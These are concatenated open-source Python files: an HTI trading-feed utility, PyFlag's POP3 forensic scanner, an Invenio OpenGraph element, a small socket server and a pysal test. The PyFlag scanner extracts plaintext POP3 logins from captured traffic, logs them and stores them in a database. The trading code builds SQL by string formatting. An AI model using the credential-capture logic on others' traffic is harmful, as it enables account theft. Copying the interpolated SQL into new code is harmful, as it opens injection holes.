errdict = addDictError('Trader', 'Invalid trader of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
return trdnbr, tradeSituation
def LoopValidationErrMsg(errdict):
errmsg = ''
# Instrument
invalidInsArray = errdict['invalidIns']
i = 0
while i <= len(invalidInsArray[0])-1:
errmsg = errmsg + invalidInsArray[0][i].strip()
body = invalidInsArray[1][i].split('|')
j = 0
while j <= len(body)-1:
errmsg = errmsg + '\n\t' + body[j]
j = j + 1
i = i + 1
if errmsg != '':
errmsg = errmsg + '\n\n'
#print 'errmsg=%s' % errmsg
invalidCptyArray = errdict['invalidParty']
i = 0
while i <= len(invalidCptyArray[0])-1:
errmsg = errmsg + invalidCptyArray[0][i].strip()
body = invalidCptyArray[1][i].split('|')
j = 0
while j <= len(body)-1:
errmsg = errmsg + '\n\t' + body[j]
j = j + 1
i = i + 1
if errmsg != '':
errmsg = errmsg + '\n\n'
invalidPfArray = errdict['invalidPf']
i = 0
while i <= len(invalidPfArray[0])-1:
errmsg = errmsg + invalidPfArray[0][i].strip()
body = invalidPfArray[1][i].split('|')
j = 0
while j <= len(body)-1:
errmsg = errmsg + '\n\t' + body[j]
j = j + 1
i = i + 1
if errmsg != '':
errmsg = errmsg + '\n\n'
invalidTrdCcyArray = errdict['invalidTrdCcy']
i = 0
while i <= len(invalidTrdCcyArray[0])-1:
errmsg = errmsg + invalidTrdCcyArray[0][i].strip()
body = invalidTrdCcyArray[1][i].split('|')
j = 0
while j <= len(body)-1:
errmsg = errmsg + '\n\t' + body[j]
j = j + 1
i = i + 1
if errmsg != '':
errmsg = errmsg + '\n\n'
invalidAcqArray = errdict['invalidAcquirer']
i = 0
while i <= len(invalidAcqArray[0])-1:
errmsg = errmsg + invalidAcqArray[0][i].strip()
body = invalidAcqArray[1][i].split('|')
j = 0
while j <= len(body)-1:
errmsg = errmsg + '\n\t' + body[j]
j = j + 1
i = i + 1
if errmsg != '':
errmsg = errmsg + '\n\n'
invalidBrokerArray = errdict['invalidBroker']
i = 0
while i <= len(invalidBrokerArray[0])-1:
errmsg = errmsg + invalidBrokerArray[0][i].strip()
body = invalidBrokerArray[1][i].split('|')
j = 0
while j <= len(body)-1:
errmsg = errmsg + '\n\t' + body[j]
j = j + 1
i = i + 1
if errmsg != '':
errmsg = errmsg + '\n\n'
return errmsg
def mapCounterparty(acc, addinfo_fieldname):
strSql = """select p.ptyid
from party p, additionalinfo a, additionalinfospec s
where p.ptynbr = a.recaddr
and a.addinf_specnbr = s.specnbr
and s.field_name = '%s'
and s.rec_type = 'Party'
and (a.value = '%s' or a.value like '%s' or a.value like '%s')""" % (addinfo_fieldname, acc, acc+',%', '%,'+acc)
print strSql
rs = ael.asql(strSql)
ptyid = ''
columns, buf = rs
for table in buf:
for row in table:
ptyid = row[0]
return ptyid
'''
def mapMssAccCode(prfid, insid):
acm_pf = acm.FPhysicalPortfolio[prfid]
acm_ins = acm.FInstrument[insid]
if acm_pf != None and acm_ins != None:
if acm_ins.Otc() == False:
if acm_ins.InsType() in ('Stock', 'Warrant'):
return acm_pf.AdditionalInfo().MSSACC_STOCK().strip()
elif acm_ins.InsType() == 'Future/Forward':
return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
elif acm_ins.InsType() == 'Option':
if acm_ins.Underlying().InsType() == 'Stock':
return acm_pf.AdditionalInfo().MSSACC_STOCK_OPT().strip()
elif acm_ins.Underlying().InsType() == 'EquityIndex':
return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
else:
return ""
else:
return ""
else:
return acm_pf.AdditionalInfo().MSSACC_OTC().strip()
else:
return ""
'''
def mapMssAccCode(prfid, insid):
acm_pf = acm.FPhysicalPortfolio[prfid]
acm_ins = acm.FInstrument[insid]
if acm_pf != None and acm_ins != None:
if acm_ins.Otc() == False:
if acm_ins.InsType() in ('Stock', 'Warrant'):
if acm_pf.AdditionalInfo().MSSACC_STOCK() != None:
return acm_pf.AdditionalInfo().MSSACC_STOCK().strip()
else:
return ''
elif acm_ins.InsType() == 'Future/Forward':
if acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT() != None:
return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
else:
return ''
elif acm_ins.InsType() == 'Option':
if acm_ins.Underlying().InsType() == 'Stock':
if acm_pf.AdditionalInfo().MSSACC_STOCK_OPT() != None:
return acm_pf.AdditionalInfo().MSSACC_STOCK_OPT().strip()
else:
return ''
elif acm_ins.Underlying().InsType() == 'EquityIndex':
if acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT() != None:
return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
return ''
else:
return ""
else:
return ""
else:
if acm_pf.AdditionalInfo().MSSACC_OTC() != None:
return acm_pf.AdditionalInfo().MSSACC_OTC().strip()
return ''
else:
return ""
def mapMssAccCode_withshortsell(prfid, insid, short_sell):
bool_short_sell = IsShortSellTrade(short_sell)
acm_pf = acm.FPhysicalPortfolio[prfid]
acm_ins = acm.FInstrument[insid]
if acm_pf != None and acm_ins != None:
if acm_ins.Otc() == False:
if acm_ins.InsType() in ('Stock', 'Warrant'):
if bool_short_sell:
if acm_pf.AdditionalInfo().MSS_STOCK_SHORT() != None:
return acm_pf.AdditionalInfo().MSS_STOCK_SHORT().strip()
else:
return ''
else:
if acm_pf.AdditionalInfo().MSSACC_STOCK() != None:
return acm_pf.AdditionalInfo().MSSACC_STOCK().strip()
else:
return ''
elif acm_ins.InsType() == 'Future/Forward':
if bool_short_sell:
if acm_pf.AdditionalInfo().MSS_FUT_OPT_SHORT() != None:
return acm_pf.AdditionalInfo().MSS_FUT_OPT_SHORT().strip()
else:
return ''
else:
if acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT() != None:
return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
else:
return ''
elif acm_ins.InsType() == 'Option':
if acm_ins.Underlying().InsType() == 'Stock':
if bool_short_sell:
if acm_pf.AdditionalInfo().MSS_STOCK_OPT_SHORT() != None:
return acm_pf.AdditionalInfo().MSS_STOCK_OPT_SHORT().strip()
else:
return ''
else:
if acm_pf.AdditionalInfo().MSSACC_STOCK_OPT() != None:
return acm_pf.AdditionalInfo().MSSACC_STOCK_OPT().strip()
else:
return ''
elif acm_ins.Underlying().InsType() == 'EquityIndex':
if bool_short_sell:
if acm_pf.AdditionalInfo().MSS_FUT_OPT_SHORT() != None:
return acm_pf.AdditionalInfo().MSS_FUT_OPT_SHORT().strip()
return ''
else:
if acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT() != None:
return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
return ''
else:
return ""
else:
return ""
else:
if bool_short_sell:
if acm_pf.AdditionalInfo().MSS_OTC_SHORT() != None:
return acm_pf.AdditionalInfo().MSS_OTC_SHORT().strip()
return ''
else:
if acm_pf.AdditionalInfo().MSSACC_OTC() != None:
return acm_pf.AdditionalInfo().MSSACC_OTC().strip()
return ''
else:
return ""
def mapAcquirerByPf(prfid, insid, short_sell):
acm_ins = acm.FInstrument[insid]
if acm_ins == None:
return ""
bool_short_sell = IsShortSellTrade(short_sell)
acq_type = ''
if acm_ins.Otc() == False:
if acm_ins.InsType() in ('Stock', 'Warrant'):
if bool_short_sell:
acq_type = "ACQ_STOCK_SHORT"
else:
acq_type = "ACQUIRER_STOCK"
elif acm_ins.InsType() == 'Future/Forward':
if bool_short_sell:
acq_type = "ACQ_FUT_OPT_SHORT"
else:
acq_type = "ACQUIRER_FUTURE_OPT"
elif acm_ins.InsType() == 'Option':
if acm_ins.Underlying().InsType() == 'Stock':
if bool_short_sell:
acq_type = "ACQ_STOCK_OPT_SHORT"
else:
acq_type = "ACQUIRER_STOCK_OPT"
elif acm_ins.Underlying().InsType() == 'EquityIndex':
if bool_short_sell:
acq_type = "ACQ_FUT_OPT_SHORT"
else:
acq_type = "ACQUIRER_FUTURE_OPT"
else:
return ""
else:
return ""
else:
if bool_short_sell:
acq_type = "ACQ_OTC_SHORT"
else:
acq_type = "ACQUIRER_OTC"
acq_ptyid = ''
strSql = """select ai.value
from portfolio pf, additionalinfo ai, additionalinfospec ais
where pf.prfnbr = ai.recaddr
and ai.addinf_specnbr = ais.specnbr
and ais.field_name = '%s'
and pf.prfid = '%s'
and ais.rec_type = 'Portfolio'""" % (acq_type, prfid)
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
trdnbr = 0
for table in buf:
for row in table:
acq_ptyid = row[0].strip()
break
return acq_ptyid
def mapPfByMssAcc(trd_mss_acc, insid):
acm_ins = acm.FInstrument[insid]
if acm_ins == None:
return ""
pf_type = ''
if acm_ins.Otc() == False:
if acm_ins.InsType() in ('Stock', 'Warrant'):
pf_type = "MSSACC_STOCK"
elif acm_ins.InsType() == 'Future/Forward':
pf_type = "MSSACC_FUTURE_OPT"
elif acm_ins.InsType() == 'Option':
if acm_ins.Underlying().InsType() == 'Stock':
pf_type = "MSSACC_STOCK_OPT"
elif acm_ins.Underlying().InsType() == 'EquityIndex':
pf_type = "MSSACC_FUTURE_OPT"
else:
return ""
else:
return ""
else:
pf_type = "MSSACC_OTC"
prfid = ''
strSql = """select pf.prfid
from portfolio pf, additionalinfo ai, additionalinfospec ais
where pf.prfnbr = ai.recaddr
and ai.addinf_specnbr = ais.specnbr
and ais.field_name = '%s'
and ai.value = '%s'
and ais.rec_type = 'Portfolio'""" % (pf_type, trd_mss_acc)
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
trdnbr = 0
for table in buf:
for row in table:
prfid = row[0].strip()
break
return prfid
def mapPf(pf, addinfo_fieldname):
strSql = """select p.prfid
from portfolio p, additionalinfo a, additionalinfospec s
where p.prfnbr = a.recaddr
and a.addinf_specnbr = s.specnbr
and s.field_name = '%s'
and s.rec_type = 'Portfolio'
and (a.value = '%s' or a.value like '%s' or a.value like '%s')""" % (addinfo_fieldname, pf, pf+',%', '%,'+pf)
#print strSql
rs = ael.asql(strSql)
prfid = ''
columns, buf = rs
for table in buf:
for row in table:
prfid = row[0]
return prfid
def getIssuerByWarrantName(warrant_name, addinfo_fieldname):
issuer_ptyid = ''
#print 'A'
if len(warrant_name) >= 2:
#print 'B'
strSql = """select p.ptyid
from party p, additionalinfo a, additionalinfospec s
where p.ptynbr = a.recaddr
and a.addinf_specnbr = s.specnbr
and s.field_name = '%s'
and s.rec_type = 'Party'
and a.value = '%s'""" % (addinfo_fieldname, warrant_name[0:2])
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
for table in buf:
for row in table:
issuer_ptyid = row[0]
return issuer_ptyid
def IsETF_from_Exchange(localcode):
sqlstr = """SELECT stock_code FROM ETFTradingArrangement WHERE stock_code = '%s'""" % (localcode)
result = HTI_DB_Functions.exec_sql_return_table(sqlstr, dsn, 'V', False)
DataTable = []
if result.EOF == False:
# it is an ETF
return True
else:
# it is a normal stock
return False
'''
def mapMSSAccAgainstHorizonPf(horizon_pf)
strSql = """select a.value
from portfolio p, additionalinfo a, additionalinfospec s
where pf.prfnbr = a.recaddr
and a.addinf_specnbr = s.specnbr
and s.field_name = '%s'
and s.rec_type = 'Portfolio'
and a.value = '%s'""" % (addinfo_fieldname, warrant_name[0:2])
'''
def createStockOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
insid = ''
#bb_ticker = formatBBTicker(insMic, insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
#if bb_ticker == '':
# return insid
prodId = localcode
insid = getInsidByBBTicker(localcode)
#print 'Z'
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, '', 'OPTION', insUnderlying_mktId)
return insid
#print 'Z1'
insTemplateId = 'Template Option'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Generic(False)
ins_new.Name(prodId)
ins_new.Underlying(ins_underlying_insid)
ins_new.ExpiryDate(insMaturity)
ins_new.Currency(insCcy)
if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
ins_new.IsCallOption(True)
else:
ins_new.IsCallOption(False)
if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
ins_new.ExerciseType('European')
else:
ins_new.ExerciseType('American')
if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
ins_new.StrikeCurrency(insCcy)
ins_new.StrikePrice(float(insStrike))
ins_new.ContractSize(float(insPointValue))
# Underlying Type
insUnderlyingInsType = ins_new.Underlying().InsType()
ins_new.ValuationGrpChlItem('OTC Equity Option')
#print 'Z2'
ins_new.Otc(True)
#print 'Z3'
ins_new.Commit()
#print 'Z4', localcode
# Create Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, '', 'OPTION', insUnderlying_mktId)
#print 'Z5', 'Z51'
#print ins_new
insid = ins_new.Name()
#print 'Z6', insid
return insid
def createIndexOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
insid = ''
prodId = localcode
insid = getInsidByBBTicker(localcode)
if insid != '':
CreateInsAdditionalInfo(insid, "", insDesc, insName, "", 'OPTION', insUnderlying_mktId)
return insid
insTemplateId = getIndexOptionTemplate(ins_underlying_insid, insPointValue)
if insTemplateId == '':
return insid
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Generic(False)
ins_new.Name(prodId)
ins_new.Underlying(ins_underlying_insid)
ins_new.ExpiryDate(insMaturity)
ins_new.Currency(insCcy)
if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
ins_new.IsCallOption(True)
else:
ins_new.IsCallOption(False)
if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
ins_new.ExerciseType('European')
else:
ins_new.ExerciseType('American')
if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
ins_new.StrikeCurrency(insCcy)
ins_new.StrikePrice(float(insStrike))
ins_new.ContractSize(float(insPointValue))
# Underlying Type
insUnderlyingInsType = ins_new.Underlying().InsType()
ins_new.ValuationGrpChlItem('OTC Index Option')
ins_new.Otc(True)
ins_new.Commit()
# Create Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), "", insDesc, insName, "", 'OPTION', insUnderlying_mktId)
insid = ins_new.Name()
return insid
def getInstrument_otc(tradeId, way, qty, price, insLocalCode,
trdCcy, insMic, insCcy, insDesc, insProdType,
insMaturity, insPointValue, insStrike, insOptionType,
insExecType, insBullBear, insBarrier, insOtc, insDeliveryType,
insUlLocalCode, insULProdType, insULMic, insULCcy, insULDesc,
trdChannel, insIssueSize, insIssueDate, insBarrierType, issuer_ptyid,
insName, insULName, insUnderlying_mktId, warrantParity,
mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval,
fo_system, new_arr_ins, errdict):
newIns = False
trd_insid = ''
insProdType = insProdType.upper()
insULProdType = insULProdType.upper()
insOptionType = insOptionType.upper()
insExecType = insExecType.upper()
insBullBear = insBullBear.upper()
insOtc = insOtc.upper()
insDeliveryType = insDeliveryType.upper()
if insProdType == 'OPTION':
ins_insid = ''
#print insLocalCode
acm_ins = acm.FInstrument[insLocalCode] # use horizon local code as FA insid
if acm_ins != None:
ins_insid = acm_ins.Name()
if ins_insid == '':
# get Underlying
ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
if ins_underlying_insid == '':
if insULProdType == 'STOCK':
ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
elif insULProdType == 'INDEX':
ins_underlying_insid = ''
#ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
if ins_underlying_insid != '':
new_arr_ins.append(ins_underlying_insid)
else:
acm_ins = acm.FInstrument[ins_underlying_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
if ul_bb_ticker != '':
createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
# Create Option
if ins_underlying_insid != '':
ins_new_insid = ''
if insULProdType == 'STOCK':
ins_new_insid = createStockOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
elif insULProdType == 'INDEX':
ins_new_insid = createIndexOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
if ins_new_insid != '':
trd_insid = ins_new_insid
new_arr_ins.append(ins_new_insid)
newIns = True
else:
acm_ins = acm.FInstrument[ins_insid]
CreateInsAdditionalInfo(acm_ins.Name(), "", insDesc, insName, "", insProdType, insUnderlying_mktId)
trd_insid = ins_insid
newIns = False
return trd_insid, newIns
def IsShortSellTrade(short_sell):
short_sell = short_sell.upper()
if short_sell in ('SHORT', 'MARKET_MAKER'):
return True
else:
return False
| frederick623/HTI | fa_util_py/HTI_FeedTrade_EDD_Util.py | Python | apache-2.0 | 114,684 |
""" This module implements features specific for POP Processing """
# Michael Cohen <scudette@users.sourceforge.net>
# Gavin Jackson <Gavz@users.sourceforge.net>
#
# ******************************************************
# Version: FLAG $Version: 0.87-pre1 Date: Thu Jun 12 00:48:38 EST 2008$
# ******************************************************
#
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# ******************************************************
import pyflag.conf
config=pyflag.conf.ConfObject()
from pyflag.Scanner import *
import pyflag.Scanner as Scanner
import pyflag.Time as Time
import re, posixpath
from NetworkScanner import *
config.add_option("POP3_PORTS", default='[110,]',
help="A list of ports to be considered for POP transactions")
class POPException(Exception):
""" Raised if line is an invalid pop command """
class POP:
""" Class managing the pop connection information """
def __init__(self,fd):
self.fd=fd
self.dispatcher={
"+OK" :self.NOOP,
"-ERR" :self.NOOP,
"DELE" :self.NOOP,
"QUIT" :self.NOOP,
}
self.username=''
self.password=''
self.files=[]
def read_multi_response(self):
""" Reads the next few lines off fd and returns a combined response """
result=''
while 1:
line = self.fd.readline()
if not line or line=='.\r\n':
return result
## This cleans out escaped lines as mentioned in the RFC
if line.startswith('.'): line=line[1:]
result+=line
def NOOP(self,args):
""" A do nothing parser """
def CAPA(self,args):
## We just ignore this
self.read_multi_response()
def USER(self,args):
response=self.fd.readline()
self.username=args[0]
def PASS(self,args):
response=self.fd.readline()
if response.startswith("+OK"):
self.password=args[0]
pyflaglog.log(pyflaglog.DEBUG,"Login for %s successful with password %s" % (self.username,self.password))
def STAT(self,args):
""" We ignore STAT commands """
response=self.fd.readline()
def LIST(self,args):
""" We ignore LIST commands """
self.read_multi_response()
def UIDL(self,args):
self.read_multi_response()
#GJ: We _really_ needed to handle this command
def TOP(self,args):
## Read the first line to see if it has been successful:
response=self.fd.readline()
if response.startswith("+OK"):
start = self.fd.tell()
data = self.read_multi_response()
length = len(data)
pyflaglog.log(pyflaglog.DEBUG,"Message %s starts at %s in stream and is %s long" % (args[0],start,length))
self.files.append((args[0],(start,length)))
def RETR(self,args):
## Read the first line to see if it has been successful:
response=self.fd.readline()
if response.startswith("+OK"):
start = self.fd.tell()
data = self.read_multi_response()
length = len(data)
pyflaglog.log(pyflaglog.DEBUG,"Message %s starts at %s in stream and is %s long" % (args[0],start,length))
self.files.append((args[0],(start,length)))
def parse(self):
line = self.fd.readline().strip()
if not line: return 0
tmp = line.split(" ")
command=tmp[0]
args=tmp[1:]
## Dispatch the command handler:
try:
self.__class__.__dict__[command](self,args)
except KeyError,e:
try:
self.dispatcher[command](args)
except KeyError:
raise POPException("POP: Command %r not implemented." % (command))
except Exception,e:
raise POPException("POP: Unable to parse line: %s." % (line))
return line
class EmailTables(FlagFramework.EventHandler):
def create(self, dbh, case):
## This table stores common usernames/passwords:
dbh.execute(
""" CREATE TABLE if not exists `passwords` (
`inode_id` INT,
`username` VARCHAR(255) NOT NULL,
`password` VARCHAR(255) NOT NULL,
`type` VARCHAR(255) NOT NULL
) """)
class POPScanner(StreamScannerFactory):
""" Collect information about POP transactions.
"""
default = True
group = 'NetworkScanners'
def process_stream(self, stream, factories):
forward_stream, reverse_stream = self.stream_to_server(stream, "POP3")
if not reverse_stream or not forward_stream: return
combined_inode = "I%s|S%s/%s" % (stream.fd.name, forward_stream,reverse_stream)
pyflaglog.log(pyflaglog.DEBUG,"Openning %s for POP3" % combined_inode)
## We open the file and scan it for emails:
fd = self.fsfd.open(inode=combined_inode)
inode_id = 0
p=POP(fd)
while 1:
try:
if not p.parse():
break
except POPException,e:
pyflaglog.log(pyflaglog.DEBUG,"%s" % e)
for f in p.files:
## Add a new VFS node
offset, length = f[1]
new_inode="%s|o%s:%s" % (combined_inode,offset, length)
ds_timestamp = Time.convert(stream.ts_sec, case=self.case, evidence_tz="UTC")
date_str = ds_timestamp.split(" ")[0]
path, inode, inode_id = self.fsfd.lookup(inode=combined_inode)
path=posixpath.normpath(path+"/../../../../../")
inode_id = self.fsfd.VFSCreate(None,new_inode,
"%s/POP/%s/Message_%s" % (path, date_str,
f[0]),
mtime=stream.ts_sec,
size = length
)
## Scan the new file using the scanner train. If
## the user chose the RFC2822 scanner, we will be
## able to understand this:
self.scan_as_file(new_inode, factories)
## If there is any authentication information in here,
## we save it for Ron:
dbh = DB.DBO(self.case)
if p.username and p.password:
dbh.execute("insert into passwords set inode_id=%r,username=%r,password=%r,type='POP3'",(
inode_id, p.username, p.password))
class Scan(StreamTypeScan):
types = [ "protocol/x-pop-request" ]
import pyflag.Magic as Magic
class POPRequstStream(Magic.Magic):
""" Detect POP Request stream """
type = "POP Request Stream"
mime = "protocol/x-pop-request"
default_score = 20
regex_rules = [
## These are the most common pop commands - we look for at least 5 of them:
( "CAPA", (0,50)),
( "\nUSER ", (0,50)),
( "\nPASS ", (0,50)),
( "LIST\r\n", (0,50)),
( "UIDL\r\n", (0,50)),
( "RETR [0-9]+", (0,50)),
( "DELE [0-9]+", (0,50))
]
samples = [
( 100, \
"""CAPA
USER thadon
PASS password1
CAPA
LIST
UIDL
RETR 1
DELE 1
QUIT
""")]
class POPResponseStream(Magic.Magic):
""" Detect POP Response stream """
type = "POP Response Stream"
mime = "protocol/x-pop-response"
default_score = 20
regex_rules = [
( "\n.OK ", (0,500))
]
samples = [
( 100, \
"""+OK POP3 mailhost.someisp1.com.au (Version 3.1e-3) http://surgemail.com
+OK Capability list follows
TOP
USER
UIDL
SURGEMAIL
.
+OK scudette@users.sourceforg.net nice to hear from you - password required
+OK scudette has 1 mail messages
+OK 1 30202
+OK 1 (30202)
""")]
## UnitTests:
import pyflag.tests as tests
import pyflag.pyflagsh as pyflagsh
from pyflag.FileSystem import DBFS
class POPTests(tests.ScannerTest):
""" Tests POP Scanner """
test_case = "PyFlagTestCase"
test_file = "stdcapture_0.4.pcap.e01"
subsystem = "EWF"
fstype = "PCAP Filesystem"
order = 21
def test01SMTPScanner(self):
""" Test POP Scanner """
env = pyflagsh.environment(case=self.test_case)
pyflagsh.shell_execv(env=env,
command="scan",
argv=["*", ## Inodes (All)
"POPScanner", "RFC2822",
]) ## List of Scanners
dbh = DB.DBO(self.test_case)
dbh.execute("select count(*) as total from passwords where type='POP3'")
row = dbh.fetch()
self.failIf(row['total']==0,"Could not parse any POP3 passwords")
| backupManager/pyflag | src/plugins_old/NetworkForensics/ProtocolHandlers/POP.py | Python | gpl-2.0 | 9,518 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2013 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - return the video of a record"""
import cgi
from invenio.config import CFG_SITE_URL, CFG_SITE_SECURE_URL, CFG_CERN_SITE
from invenio.legacy.bibdocfile.api import BibRecDocs, get_superformat_from_format
from invenio.config import CFG_WEBSEARCH_ENABLE_OPENGRAPH
def format_element(bfo):
"""
Return the video of the record, suitable for the Open Graph protocol.
"""
if not CFG_WEBSEARCH_ENABLE_OPENGRAPH:
return ""
bibarchive = BibRecDocs(bfo.recID)
bibdocs = bibarchive.list_bibdocs()
additional_tags = ""
tags = []
videos = []
images = []
for doc in bibdocs:
found_icons = []
found_image_url = ''
for docfile in doc.list_latest_files():
if docfile.is_icon():
found_icons.append((docfile.get_size(), docfile.get_url()))
elif get_superformat_from_format(docfile.get_format()).lower() in [".mp4", '.webm', '.ogv']:
found_image_url = docfile.get_url()
found_icons.sort()
for icon_size, icon_url in found_icons:
images.append((icon_url, icon_url.replace(CFG_SITE_URL, CFG_SITE_SECURE_URL)))
if found_image_url:
videos.append((found_image_url, found_image_url.replace(CFG_SITE_URL, CFG_SITE_SECURE_URL)))
if CFG_CERN_SITE:
mp4_urls = [url.replace('http://mediaarchive.cern.ch', 'https://mediastream.cern.ch') \
for url in bfo.fields('8567_u') if url.endswith('.mp4')]
img_urls = [url.replace('http://mediaarchive.cern.ch', 'https://mediastream.cern.ch') \
for url in bfo.fields('8567_u') if url.endswith('.jpg') or url.endswith('.png')]
if mp4_urls:
mp4_url = mp4_urls[0]
if "4/3" in bfo.field("300__b"):
width = "640"
height = "480"
else:
width = "640"
height = "360"
additional_tags += '''
<meta property="og:video" content="%(CFG_CERN_PLAYER_URL)s?file=%(mp4_url_relative)s&streamer=%(CFG_STREAMER_URL)s&provider=rtmp&stretching=exactfit&image=%(image_url)s" />
<meta property="og:video:height" content="%(height)s" />
<meta property="og:video:width" content="%(width)s" />
<meta property="og:video:type" content="application/x-shockwave-flash" />
<meta property="og:video" content="%(mp4_url)s" />
<meta property="og:video:type" content="video/mp4" />
<meta property="og:image" content="%(image_url)s" />
<meta name="twitter:player:height" content="%(height)s" />
<meta name="twitter:player:width" content="%(width)s" />
<link rel="image_src" href="%(image_url)s" />
<link rel="video_src" href="%(CFG_CERN_PLAYER_URL)s?file=%(mp4_url_relative)s&streamer=%(CFG_STREAMER_URL)s&provider=rtmp&stretching=exactfit&image=%(image_url)s"/>
''' % {'CFG_CERN_PLAYER_URL': "https://cds.cern.ch/mediaplayer.swf",
'CFG_STREAMER_URL': "rtmp://wowza.cern.ch:1935/vod",
'width': width,
'height': height,
'image_url': img_urls and img_urls[0] or '',
'mp4_url': mp4_url.replace('http://mediaarchive.cern.ch', 'https://mediastream.cern.ch'),
'mp4_url_relative': '/' + '/'.join(mp4_url.split('/')[4:])}
try:
from invenio.media_utils import generate_embedding_url
embed_url = generate_embedding_url(bfo.field('037__a'))
additional_tags += '''<meta name="twitter:player" content="%s"/>''' % cgi.escape(embed_url, quote=True).replace('http://', 'https://', 1)
except:
pass
tags = ['<meta property="og:image" content="%s" />%s' % (image_url, image_url != image_secure_url and '\n<meta property="og:image:secure_url" content="%s" />' % image_secure_url or "") for image_url, image_secure_url in images]
tags.extend(['<meta property="og:video" content="%s" />%s' % (video_url, video_url != video_secure_url and '\n<meta property="og:video:secure_url" content="%s" />' % video_secure_url or "") for video_url, video_secure_url in videos])
return "\n".join(tags) + additional_tags
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
| zenodo/invenio | invenio/modules/formatter/format_elements/bfe_meta_opengraph_video.py | Python | gpl-2.0 | 5,334 |
#!/usr/bin/env python
import socket
TCP_IP = ''
TCP_PORT = 5005
BUFFER_SIZE = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
conn, addr = s.accept()
print 'Starting'
print 'Connection address:', addr
while 1:
data = conn.recv(BUFFER_SIZE)
if not data: break
print "Frame received: " + data
conn.close()
| MichaelCoughlinAN/Odds-N-Ends | Python/test_server.py | Python | gpl-3.0 | 376 |
import os
import unittest
import numpy as np
from ..util import neighbor_equality
from ..weights import W
from .. import user
from ... import examples as pysal_examples
class Testuser(unittest.TestCase):
def setUp(self):
self.wq = user.queen_from_shapefile(
pysal_examples.get_path("columbus.shp"))
self.wr = user.rook_from_shapefile(
pysal_examples.get_path("columbus.shp"))
def test_queen_from_shapefile(self):
self.assertAlmostEquals(self.wq.pct_nonzero, 9.82923781757601)
def test_rook_from_shapefile(self):
